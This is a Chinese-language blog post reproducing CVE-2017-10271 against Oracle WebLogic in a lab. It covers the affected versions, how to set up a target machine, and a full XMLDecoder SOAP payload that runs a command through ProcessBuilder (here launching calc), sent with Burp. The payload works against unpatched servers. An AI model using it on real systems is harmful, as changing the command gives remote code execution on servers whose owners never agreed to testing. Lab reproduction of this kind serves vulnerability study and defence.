漏洞编号:CVE-2017-10271
受影响WebLogic版本:
- 10.3.6.0.0
- 12.1.3.0.0
- 12.2.1.1.0
- 12.2.1.2.0
漏洞复现环境搭建
靶机:win7 x64
攻击机:win8 x64
靶机相关环境
安装JDK(java版本):
安装JDK.png
安装WebLogic
WebLogic 版本:10.3.6.0
- 不勾选 “我希望通过My Oracle Support接收安全更新”。
图片.png
图片.png
- 选择生产模式
图片.png
- 若安装选择的默认路径与默认域名,在如下路径中运行
C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.cmd
输入用户名,密码登录
-
若出现如下图的默认页面则环境配置完成:
图片.png
漏洞利用
漏洞利用POC
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>calc</string>
</void>
<void index="1">
<string></string>
</void>
<void index="2">
<string> </string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
利用过程
- 使用攻击机访问靶机的WLS组件,并用burp把包拦截下来:
- 使用post方法发送上述POC,并添加Content-Type:text/xml,把Cache-Control修改为no-cache
burp.png
- 发送到repeater模块中 重放
返回状态 500
图片.png
- 返回靶机弹出 计算器
图片.png
网友评论